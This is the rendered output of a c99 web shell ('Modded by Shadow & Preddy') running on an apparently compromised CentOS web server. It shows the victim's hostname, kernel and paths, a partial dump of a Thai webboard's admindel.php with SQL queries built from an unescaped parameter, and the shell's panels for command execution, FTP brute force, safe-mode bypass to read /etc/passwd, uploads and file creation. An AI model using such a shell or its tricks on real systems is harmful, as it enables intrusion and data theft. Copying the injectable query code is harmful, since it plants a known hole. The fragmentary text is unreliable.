!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/   drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     admindel.php (6.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?echo $title?>
รหัสถูกต้อง
หมายเลขคำถาม
(กระทู้)

หมายเลขคำตอบ

"; unlink("$path/$rowpic2[0]"); echo "
"; echo " $rowpic1[0]"; unlink("$path/$rowpic1[0]"); echo "
"; } elseif($rowpic2[0]!="") { echo "
"; echo "$rowpic2[0]"."3"; unlink("$path/$rowpic2[0]"); } elseif($rowpic1[0]!="") { echo "
"; echo "$rowpic1[0]"."3"; unlink("$path/$rowpic1[0]"); } $del_question = "DELETE FROM webboard_data WHERE No='$num'"; $del_answer = "DELETE FROM webboard_ans WHERE QuestionNo='$num'"; //new line edit /* $del_answer= "UPDATE webboard_data SET Reply=Reply-1 WHERE No='$num'"; $del_question= "UPDATE webboard_data SET Reply=Reply-1 WHERE No='$num'";*/ //$del_answer ="delete from webboard_data where Reply='$Reply'"; //$del_answer ="delete from webboard_data where Reply=$Reply"; $result1 = mysql_db_query($dbname,$del_question); $result2 = mysql_db_query($dbname,$del_answer); $result3 = mysql_db_query($dbname,$Nopic1); $result4 = mysql_db_query($dbname,$Nopic2); //$result3 = mysql_db_query($dbname,$del_answe2); if(!$result1 && !$result2 ) { err_msg("มีข้อผิดพลาดที่ระบบ","กรุณาแจ้ง admin ให้ตรวจสอบด้วยครับ",""); } else { echo "
"; echo ""; echo "
"; echo ""; echo "ลบข้อมูลเรียบร้อยแล้ว

"; echo "$msg หมายเลข $num และคำตอบทั้งหมด ได้ถูกลบออกจากฐานข้อมูลแล้วครับ"; echo "
"; echo "

"; echo ""; echo "[Back]"; echo ""; echo "
"; exit(); } } else { $Nopic = "select nphoto from webboard_ans where No='$num' "; $resultpic = mysql_db_query($dbname,$Nopic); $rowpic = mysql_fetch_row($resultpic); if($rowpic[0]!='') { echo "$rowpic[0]"." 2"; unlink("$path/$rowpic[0]"); } $del_sql = "DELETE FROM webboard_ans WHERE No='$num'"; $result = mysql_db_query($dbname,$del_sql); if(!$result) { err_msg("มีข้อผิดพลาดที่ระบบ","กรุณาแจ้ง admin ให้ตรวจสอบด้วยครับ",""); } else { echo "
"; echo ""; echo "
"; echo ""; echo "ลบข้อมูลเรียบร้อยแล้ว

"; echo "$msg หมายเลข $num ได้ถูกลบออกจากฐานข้อมูลแล้วครับ"; echo "
"; echo "

"; echo ""; echo "[Back]"; echo ""; echo "
"; exit(); } } } function err_msg($topic,$detial,$url) { echo "
"; echo ""; echo "
"; echo ""; echo "$topic

"; echo $detial; echo "
"; echo "
"; echo ""; if(!$url) { echo "[Back]"; } else { echo "[Back]"; } echo "

"; //footer(); echo "
"; exit(); } /*function footer() { echo "
"; echo ""; echo "CopyLEFT and Powered By : Sansak"; echo ""; }*/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--